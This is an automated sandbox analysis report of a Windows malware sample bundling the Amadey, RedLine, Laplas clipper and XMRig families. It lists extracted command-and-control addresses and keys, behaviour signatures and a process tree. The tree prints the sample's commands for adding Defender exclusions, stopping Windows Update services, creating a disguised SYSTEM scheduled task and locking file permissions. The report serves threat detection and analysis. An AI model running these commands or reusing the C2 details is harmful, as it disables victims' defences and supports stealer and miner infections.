amadey | 2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734

Analysis

max time kernel
278s
max time network
296s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
15-06-2023 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe
Size

5.0MB
MD5

890e29d78179dc4611286b863c50df53
SHA1

7bee367b02f66898b9ffb0f2569ca79c04edc19a
SHA256

2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734
SHA512

3b94b71c0301ed09c1c3fd40e9be74552e2b17fa957fb6d09c7d05451859d57b851b3b6a63dfc7bf38e9d791028841d72618f6f6deaa92ec51f7bb65f0e36e08
SSDEEP

98304:I95KeVzJFLYDAQlsumF2SEGKhq1v/28fV4AAc0cq9FcFzUkKm:ArQm2FGKq28tIbWzSm

Score

10^/10

amadey laplas redline xmrig load_am_130623 clipper discovery evasion infostealer miner persistence spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

3.80

45.15.156.208/jd9dd3Vw/index.php

second.amadgood.com/jd9dd3Vw/index.php

Extracted

Family

redline

Botnet

Load_Am_130623

165.22.100.96:81

Attributes

auth_value
c7e984e13f7f42d18969a2259aeadc52

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 876 created 1212	876	mntaskost.exe	16
PID 876 created 1212	876	mntaskost.exe	16
PID 876 created 1212	876	mntaskost.exe	16
PID 876 created 1212	876	mntaskost.exe	16
PID 876 created 1212	876	powercfg.exe	16
PID 548 created 1212	548	updater.exe	16
PID 548 created 1212	548	updater.exe	16
PID 548 created 1212	548	updater.exe	16
PID 548 created 1212	548	updater.exe	16
PID 548 created 1212	548	updater.exe	16
PID 548 created 1212	548	updater.exe	16

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mntaskost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cltaskost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/548-309-0x000000013F7E0000-0x00000001405A5000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	mntaskost.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mntaskost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mntaskost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cltaskost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cltaskost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe

Executes dropped EXE 12 IoCs

pid	Process
1776	oneetx.exe
268	metaskhost.exe
1676	metaskhost.exe
876	mntaskost.exe
1932	oneetx.exe
1356	cltaskost.exe
616	ntlhost.exe
548	updater.exe
564	oneetx.exe
688	oneetx.exe
112	oneetx.exe
1624	oneetx.exe

Loads dropped DLL 8 IoCs

pid	Process
1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe
1776	oneetx.exe
1776	oneetx.exe
268	metaskhost.exe
1776	oneetx.exe
1776	oneetx.exe
1356	cltaskost.exe
2036	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 13 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000600000001560f-149.dat	themida
behavioral1/files/0x000600000001560f-155.dat	themida
behavioral1/files/0x000600000001560f-157.dat	themida
behavioral1/memory/876-159-0x000000013F800000-0x00000001405C5000-memory.dmp	themida
behavioral1/memory/876-245-0x000000013F800000-0x00000001405C5000-memory.dmp	themida
behavioral1/files/0x000600000001560f-248.dat	themida
behavioral1/memory/876-251-0x000000013F800000-0x00000001405C5000-memory.dmp	themida
behavioral1/files/0x0008000000015c86-252.dat	themida
behavioral1/files/0x0008000000015c86-254.dat	themida
behavioral1/memory/548-255-0x000000013F7E0000-0x00000001405A5000-memory.dmp	themida
behavioral1/memory/548-263-0x000000013F7E0000-0x00000001405A5000-memory.dmp	themida
behavioral1/files/0x0008000000015c86-304.dat	themida
behavioral1/memory/548-309-0x000000013F7E0000-0x00000001405A5000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	cltaskost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mntaskost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cltaskost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
876	mntaskost.exe
1356	cltaskost.exe
616	ntlhost.exe
548	updater.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 268 set thread context of 1676	268	metaskhost.exe	41
PID 548 set thread context of 1716	548	updater.exe	89
PID 548 set thread context of 1404	548	updater.exe	90

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Chrome\updater.exe	powercfg.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1780	sc.exe
2036	sc.exe
1956	sc.exe
568	sc.exe
592	sc.exe
780	sc.exe
1512	sc.exe
924	sc.exe
1460	sc.exe
1364	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1304	schtasks.exe
1652	schtasks.exe
432	schtasks.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	10	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f09b4fab449fd901	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe
1776	oneetx.exe
1932	oneetx.exe
1676	metaskhost.exe
1676	metaskhost.exe
876	mntaskost.exe
876	mntaskost.exe
436	powershell.exe
876	mntaskost.exe
876	mntaskost.exe
876	mntaskost.exe
876	mntaskost.exe
876	mntaskost.exe
876	mntaskost.exe
928	powershell.exe
876	powercfg.exe
876	powercfg.exe
548	updater.exe
548	updater.exe
1392	powershell.exe
548	updater.exe
548	updater.exe
548	updater.exe
548	updater.exe
548	updater.exe
548	updater.exe
516	powershell.exe
564	oneetx.exe
548	updater.exe
548	updater.exe
548	updater.exe
548	updater.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe
1404	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	268	metaskhost.exe
Token: SeDebugPrivilege	1676	metaskhost.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeShutdownPrivilege	1532	powercfg.exe
Token: SeShutdownPrivilege	364	powercfg.exe
Token: SeShutdownPrivilege	932	powercfg.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeShutdownPrivilege	876	powercfg.exe
Token: SeShutdownPrivilege	112	powercfg.exe
Token: SeShutdownPrivilege	1676	powercfg.exe
Token: SeShutdownPrivilege	1620	powercfg.exe
Token: SeDebugPrivilege	548	updater.exe
Token: SeLockMemoryPrivilege	1404	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1144 wrote to memory of 1776	1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe	27
PID 1144 wrote to memory of 1776	1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe	27
PID 1144 wrote to memory of 1776	1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe	27
PID 1144 wrote to memory of 1776	1144	2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe	27
PID 1776 wrote to memory of 1304	1776	oneetx.exe	28
PID 1776 wrote to memory of 1304	1776	oneetx.exe	28
PID 1776 wrote to memory of 1304	1776	oneetx.exe	28
PID 1776 wrote to memory of 1304	1776	oneetx.exe	28
PID 1776 wrote to memory of 1544	1776	oneetx.exe	30
PID 1776 wrote to memory of 1544	1776	oneetx.exe	30
PID 1776 wrote to memory of 1544	1776	oneetx.exe	30
PID 1776 wrote to memory of 1544	1776	oneetx.exe	30
PID 1544 wrote to memory of 1836	1544	cmd.exe	32
PID 1544 wrote to memory of 1836	1544	cmd.exe	32
PID 1544 wrote to memory of 1836	1544	cmd.exe	32
PID 1544 wrote to memory of 1836	1544	cmd.exe	32
PID 1544 wrote to memory of 688	1544	cmd.exe	33
PID 1544 wrote to memory of 688	1544	cmd.exe	33
PID 1544 wrote to memory of 688	1544	cmd.exe	33
PID 1544 wrote to memory of 688	1544	cmd.exe	33
PID 1544 wrote to memory of 288	1544	cmd.exe	34
PID 1544 wrote to memory of 288	1544	cmd.exe	34
PID 1544 wrote to memory of 288	1544	cmd.exe	34
PID 1544 wrote to memory of 288	1544	cmd.exe	34
PID 1544 wrote to memory of 2012	1544	cmd.exe	35
PID 1544 wrote to memory of 2012	1544	cmd.exe	35
PID 1544 wrote to memory of 2012	1544	cmd.exe	35
PID 1544 wrote to memory of 2012	1544	cmd.exe	35
PID 1544 wrote to memory of 1980	1544	cmd.exe	36
PID 1544 wrote to memory of 1980	1544	cmd.exe	36
PID 1544 wrote to memory of 1980	1544	cmd.exe	36
PID 1544 wrote to memory of 1980	1544	cmd.exe	36
PID 1544 wrote to memory of 1932	1544	cmd.exe	37
PID 1544 wrote to memory of 1932	1544	cmd.exe	37
PID 1544 wrote to memory of 1932	1544	cmd.exe	37
PID 1544 wrote to memory of 1932	1544	cmd.exe	37
PID 1776 wrote to memory of 268	1776	oneetx.exe	40
PID 1776 wrote to memory of 268	1776	oneetx.exe	40
PID 1776 wrote to memory of 268	1776	oneetx.exe	40
PID 1776 wrote to memory of 268	1776	oneetx.exe	40
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 268 wrote to memory of 1676	268	metaskhost.exe	41
PID 1776 wrote to memory of 876	1776	oneetx.exe	43
PID 1776 wrote to memory of 876	1776	oneetx.exe	43
PID 1776 wrote to memory of 876	1776	oneetx.exe	43
PID 1776 wrote to memory of 876	1776	oneetx.exe	43
PID 2008 wrote to memory of 1932	2008	taskeng.exe	45
PID 2008 wrote to memory of 1932	2008	taskeng.exe	45
PID 2008 wrote to memory of 1932	2008	taskeng.exe	45
PID 2008 wrote to memory of 1932	2008	taskeng.exe	45
PID 1776 wrote to memory of 1356	1776	oneetx.exe	46
PID 1776 wrote to memory of 1356	1776	oneetx.exe	46
PID 1776 wrote to memory of 1356	1776	oneetx.exe	46
PID 1776 wrote to memory of 1356	1776	oneetx.exe	46
PID 1356 wrote to memory of 616	1356	cltaskost.exe	49
PID 1356 wrote to memory of 616	1356	cltaskost.exe	49
PID 1356 wrote to memory of 616	1356	cltaskost.exe	49

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe
  "C:\Users\Admin\AppData\Local\Temp\2fd399beb67f956f71061414caf34b5235b34078be4147e67b9f1a9623857734.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1144
- - C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:1304
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1836
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        5⤵
        
        PID:688
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        5⤵
        
        PID:288
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2012
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\eb0f58bce7" /P "Admin:N"
        5⤵
        
        PID:1980
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\eb0f58bce7" /P "Admin:R" /E
        5⤵
        
        PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\1000081001\metaskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\1000081001\metaskhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:268
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\metaskhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\1000081001\metaskhost.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\1000082001\mntaskost.exe
      "C:\Users\Admin\AppData\Local\Temp\1000082001\mntaskost.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Drops file in Drivers directory
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:876
  - - C:\Users\Admin\AppData\Local\Temp\1000084001\cltaskost.exe
      "C:\Users\Admin\AppData\Local\Temp\1000084001\cltaskost.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1640
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1512
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:876
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:924
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2036
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1956
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:928
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1652
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:908
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:932
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2044
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1364
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:568
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:592
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:780
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:432
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1512
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:112
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1716
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1404

C:\Windows\system32\taskeng.exe
taskeng.exe {9B3642D3-EEE4-481A-8539-C69A1BA74F08} S-1-5-21-2961826002-3968192592-354541192-1000:HVMHZIYD\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1932
- C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:564
- C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:688
- C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:112
- C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:1624

C:\Windows\system32\taskeng.exe
taskeng.exe {57219136-2BA6-4916-BE60-B4A44A410D8F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2036
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:548

C:\Windows\system32\wbem\wmiprvse.exe
